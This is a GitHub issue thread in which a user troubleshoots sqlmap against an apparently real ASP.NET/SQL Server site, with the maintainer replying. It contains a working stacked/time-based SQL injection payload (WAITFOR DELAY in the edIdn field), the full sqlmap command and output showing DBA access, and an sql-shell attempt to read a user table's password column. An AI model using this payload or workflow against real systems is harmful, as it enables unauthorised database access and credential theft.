### ISSUE TITLE
[WARNING] the SQL query provided does not return any output

### ISSUE THREAD

**Issue by Msiavashi** [sqlmapproject/sqlmap#1523]
hello

im trying to run query on the target database but what i get is this error .

root@kali:~# sqlmap --url="myURL" --data="__VIEWSTATE=/wEPDwUKLTE1NjcxMTg0Mw9kFgICAQ9kFggCAQ9kFgYCBQ8WAh4JaW5uZXJodG1sZWQCBw8WAh8ABUzYp9iq2LXYp9mEINin2LIg2LfYsdmK2YI62LTYqNqp2Ycg2K/Yp9iu2YTZii3Yp9mK2YbYqtix2YbYqiAo2LTYqNqp2YcgV0FOLTUpZAILDxYCHwAFGTxiPtux27Pbudu0L9uw27gv27HbszwvYj5kAg8PFgIfAGVkAhEPFgIeB2JnY29sb3IFByNlN2YxZjgWAgICD2QWAgIBDxYCHwBlZAITDxYCHwEFByNlN2YxZjgWAgICD2QWAgIBDxYCHwBlZGTDGgALOlsqmW9h1Y9hf/AAhVhCiUZjTLO+GkL9GvDz5w==&__EVENTVALIDATION=/wEdAAa7CjGiplfN+Nt+0FoufYhg6/R1CdSTRgr1D4vCUegGUUtX/Gjjljxs0lVmmOyjR4BjGfjIzHyCHfglyHxk6ehorF0JH6XGNmdJHVTTr8p3uaRZsz7EjWwrpc5XYai+GnDbazNSWat8gvXESVpMTOYOY+H/z3m1UkAkhflUJstjXQ==&Banner1:zzChanel=txdQ&Channel=&edNum=OQWT&edIdn=';WAITFOR DELAY '0:0:5'--&edNationalCode=hcsl" --current-user --is-dba

[*] starting at 10:33:40

[10:33:40] [WARNING] provided value for parameter 'Channel' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly

[10:33:41] [INFO] resuming back-end DBMS 'microsoft sql server' 
[10:33:41] [INFO] testing connection to the target URL

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: edIdn (POST)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __VIEWSTATE=/wEPDwUKLTE1NjcxMTg0Mw9kFgICAQ9kFggCAQ9kFgYCBQ8WAh4JaW5uZXJodG1sZWQCBw8WAh8ABUzYp9iq2LXYp9mEINin2LIg2LfYsdmK2YI62LTYqNqp2Ycg2K/Yp9iu2YTZii3Yp9mK2YbYqtix2YbYqiAo2LTYqNqp2YcgV0FOLTUpZAILDxYCHwAFGTxiPtux27Pbudu0L9uw27gv27HbszwvYj5kAg8PFgIfAGVkAhEPFgIeB2JnY29sb3IFByNlN2YxZjgWAgICD2QWAgIBDxYCHwBlZAITDxYCHwEFByNlN2YxZjgWAgICD2QWAgIBDxYCHwBlZGTDGgALOlsqmW9h1Y9hf/AAhVhCiUZjTLO+GkL9GvDz5w==&__EVENTVALIDATION=/wEdAAa7CjGiplfN+Nt+0FoufYhg6/R1CdSTRgr1D4vCUegGUUtX/Gjjljxs0lVmmOyjR4BjGfjIzHyCHfglyHxk6ehorF0JH6XGNmdJHVTTr8p3uaRZsz7EjWwrpc5XYai+GnDbazNSWat8gvXESVpMTOYOY+H/z3m1UkAkhflUJstjXQ==&Banner1:zzChanel=txdQ&Channel=&edNum=OQWT&edIdn=';WAITFOR DELAY '0:0:5'--&edNationalCode=hcsl
---
[10:33:44] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
[10:33:44] [INFO] fetching current user
[10:33:44] [INFO] resumed: shu
current user:    'shu'
[10:33:44] [INFO] testing if current user is DBA
current user is DBA:    True
[10:33:44] [INFO] fetched data logged to text files under '/root/.sqlmap/output/mysite.com'

[*] shutting down at 10:33:44

then we see that its DBA now im going to run a shell

[10:40:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2012
[10:40:03] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell> select pasword from stuser where 1=1
[10:40:12] [INFO] fetching SQL SELECT statement query output: 'select pasword from stuser where 1=1'
[10:40:12] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[10:40:31] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 

[10:40:32] [WARNING] the SQL query provided does not return any output

and its not about just this query it was just a simple example and im sure that the data i want is right there in the database . whats the problem ?

**Comment by stamparm** [comment]
Either false positive (rerun with `--flush-session`) or your table/column (i.e. `pasword`/`stuser`) doesn't exists.

**Comment by Msiavashi** [comment]
i've run the --common-tables and the --common-columns commands i got these : 

Database: ShData
[52 tables]
+--------------------------------------------+
| Chemicals                                  |
| DWE_Corr_Tokens                            |
| D_FA_ITENS                                 |
| D_FA_PARCELAS                              |
| D_PR_EVENTOS                               |
| D_US_AREA_DE_TRABALHO                      |
| D_US_EQUIPES_DO_USUARIO                    |
| LT_LANCAMENTO                              |
| LT_TIPO_DE_ACAO                            |
| Languages                                  |
| M_CADASTRO_GERAL                           |
| RATING                                     |
| Statistiken                                |
| TIL_IDIOTON                                |
| Transactions                               |
| USER_GROUP                                 |
| attivita                                   |
| authenticate                               |
| autorizacaonfe                             |
| checksum_history                           |
| child_test                                 |
| cidadao                                    |
| cmServiceDefinitionAvailableServiceBinding |
| config                                     |
| dist_universidade                          |
| emu_profiles                               |
| films                                      |
| gly                                        |
| guiaavulsa                                 |
| indice                                     |
| jos_docman_licenses                        |
| m_data                                     |
| maxcodcorreo                               |
| maxcodexperiencia                          |
| multastrategy_faixamulta                   |
| numedia                                    |
| osc_products_images                        |
| pc                                         |
| sala                                       |
| stats                                      |
| stores                                     |
| stuser                                     |
| tb_username                                |
| tbl_useraccount                            |
| tbl_works_categories                       |
| tblblogentriesrelated                      |
| tbluser                                    |
| test_users                                 |
| tipodeducao                                |
| utente                                     |
| viewStoneArtist                            |
| viktorina_ge                               |
+--------------------------------------------+



------------------------------------------------------------------------------------------------------------------------



Database: ShData
Table: stuser
[59 columns]
+--------------------+-------------+
| Column             | Type        |
+--------------------+-------------+
| aktif              | non-numeric |
| allowmassprune     | non-numeric |
| arch               | non-numeric |
| auth               | non-numeric |
| beginstateid       | non-numeric |
| bloc_row           | non-numeric |
| blogmessagesaccess | non-numeric |
| bs_id              | non-numeric |
| bsm_id             | non-numeric |
| bsu_id             | non-numeric |
| bt_id              | non-numeric |
| cachename          | non-numeric |
| cap                | non-numeric |
| cod_utente_mod     | non-numeric |
| codcliente         | non-numeric |
| comment6           | non-numeric |
| config_id          | non-numeric |
| file3              | non-numeric |
| groupcodes         | non-numeric |
| idragsoc           | non-numeric |
| isadmin            | non-numeric |
| konta              | non-numeric |
| language_id        | non-numeric |
| license_id         | non-numeric |
| login              | non-numeric |
| loginname          | non-numeric |
| macaddr            | non-numeric |
| md5sum             | non-numeric |
| mn_id              | non-numeric |
| mname              | non-numeric |
| mobile             | non-numeric |
| nt_id              | non-numeric |
| numer              | non-numeric |
| object_parent_id   | non-numeric |
| odate              | non-numeric |
| ord_id             | non-numeric |
| pasword            | non-numeric |
| pcode              | non-numeric |
| pins               | non-numeric |
| polloptionid       | non-numeric |
| pom                | non-numeric |
| prune_id           | non-numeric |
| relationsub        | non-numeric |
| relname            | non-numeric |
| rightid            | non-numeric |
| salt               | non-numeric |
| spis               | non-numeric |
| state              | non-numeric |
| temppasword        | non-numeric |
| tf_key             | non-numeric |
| user_admin         | non-numeric |
| user_email         | non-numeric |
| useradmin          | non-numeric |
| usrnam             | non-numeric |
| ville              | non-numeric |
| wdate              | non-numeric |
| white              | non-numeric |
| wp_users           | non-numeric |
| zytk               | numeric     |
+--------------------+-------------+


then they should be exist i think .

**Comment by stamparm** [comment]
`--common-tables` on time-based/stacked-based SQLi doesn't make any sense. I believe that sqlmap also warns you about this. Please rerun with `--flush-session`.

**Comment by Msiavashi** [comment]
ok one more thing .
when i try the command -D ShData --tables
it comes up with this error : Can't retrieve the table names for any database

but when i run the --dbs commad it easily find the ShData database .

whats wrong ?

**Comment by stamparm** [comment]
Your case can be anything, but I am urging you that you do the `--flush-session`.

If you are still able to find the SQLi please contact me via `miroslav@sqlmap.org` with full/more details.

**Comment by nu11secur1ty** [comment]
> --common-tables
--flush-session 
exit 0;
